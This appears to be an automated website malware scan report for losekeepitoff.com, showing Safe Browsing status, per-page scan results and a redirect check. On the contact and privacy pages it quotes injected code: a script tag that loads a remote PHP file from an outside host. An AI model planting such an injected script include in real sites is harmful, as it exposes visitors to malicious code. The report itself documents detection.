Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=losekeepitoff.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://losekeepitoff.com/ | 200 OK Content-Length: 9536 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._uds_vbw_donotrepair = false; Antivirus reports:
| ||
http://www.google.com/uds/api?file=uds.js&v=1.0&source=uds-vbw | 200 OK Content-Length: 25148 Content-Type: text/javascript | clean |
http://www.google.com/uds/solutions/videobar/gsvideobar.js?mode=new | HTTP/1.1 301 Moved Permanently Cache-Control: public, max-age=2592000 Connection: close Date: Fri, 09 Jan 2015 08:17:39 GMT Age: 98926 Location: http://uds.googleusercontent.com/uds/solutions/videobar/gsvideobar.js?mode=new Server: sffe Content-Length: 275 Content-Type: text/html; charset=UTF-8 Expires: Sun, 08 Feb 2015 08:17:39 GMT Alternate-Protocol: 80:quic,p=0.02 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block | clean |
http://uds.googleusercontent.com/uds/solutions/videobar/gsvideobar.js?mode=new | 200 OK Content-Length: 25336 Content-Type: application/x-javascript | clean |
http://losekeepitoff.com/index.htm | 200 OK Content-Length: 9536 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._uds_vbw_donotrepair = false; Antivirus reports:
| ||
http://losekeepitoff.com/contact.htm | 200 OK Content-Length: 2163 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://fullscreen.contaftp.com/imagens/Ob4tog61.php" type="text/javascript"></script> | ||
http://losekeepitoff.com/privacy.htm | 200 OK Content-Length: 2163 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://fullscreen.contaftp.com/imagens/Ob4tog61.php" type="text/javascript"></script> | ||
http://losekeepitoff.com/test404page.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: losekeepitoff.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 11:46:25 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 9536
Content-Type: text/html
Last-Modified: Thu, 17 Oct 2013 23:05:21 GMT
...9536 bytes of data.
GET / HTTP/1.1
Host: losekeepitoff.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 11:46:25 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 9536
Content-Type: text/html
Last-Modified: Thu, 17 Oct 2013 23:05:21 GMT
...9536 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: losekeepitoff.com
Referer: http://www.google.com/search?q=losekeepitoff.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: losekeepitoff.com
Referer: http://www.google.com/search?q=losekeepitoff.com
Result:
The result is similar to the first query. There are no suspicious redirects found.